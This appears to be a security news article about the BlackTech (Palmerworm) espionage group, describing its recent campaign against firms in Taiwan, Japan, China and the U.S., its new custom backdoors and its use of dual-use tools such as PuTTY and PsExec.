BlackTech is the name given to an Advanced Persistent Threat (APT) group of hackers. The same group also can be encountered under the name Palmerworm. Infosec experts first noticed the activities of this particular hacker collective way back in 2013. Since then, BlackTech has carried out several threatening attack campaigns against targets located in East Asia. The long observation period has allowed the security researchers to create a rather detailed picture of BlackTech's attack patterns, preferred malware tools, and most commonly used procedures. At its core, BlackTech's operations are concentrated on espionage, corporate data mining and information exfiltration. BlackTech is most likely state-sponsored, with Taiwanese officials stating that they believe that the hackers are backed by China publicly.
BlackTech Expand Its Reach
However, the latest detected campaign that can be attributed to this ATP group shows that the hackers might be expanding their range of targets and venturing into operations beyond the previously observed regions. While most of the targets were still located in the same East Asia region, with three companies - media, electronics, and finance, from Taiwan, an engineering company from Japan, and a construction company from China, BlackTech also managed to infiltrate a company in the U.S.
According to the researcher, the hackers from BlackTech have spent a considerable amount of time lurking in the networks of some of their victims - the network of the media company was compromised for a year, while the construction and the finance companies had their networks infiltrated for several months. At the same time, the hackers spent only a couple of days inside the network of a Japanese engineering company and just several weeks inside an electronics company. The unidentified U.S. victim had is network compromised for six months.
BlackTech Relies on Custom Malware Tools and Dual-Use Programs
As part of the latest attack campaign, four newly-crafted backdoor malware threats named Consock, Waship, Dalwit, and Nomri were spotted to be in use. Previously, BlackTech had relied on two other custom backdoors - Kivars and Pled. This batch of tools may be entirely new creations or heavily modified variants of the previous array of tools.
To better hide their threatening activity and skip the need to create sophisticated purpose-built malware entirely, BlackTech has incorporated a considerable amount of dual-use tools. In this particular campaign, four programs were employed, one of which is WinRAR, a widely used archiving tool. The other three were Putty, which can be used for remote access and data exfiltration, SNScan that can be used to scan for additional potential targets within the organization's network, and PSExec, a legitimate Microsoft tool.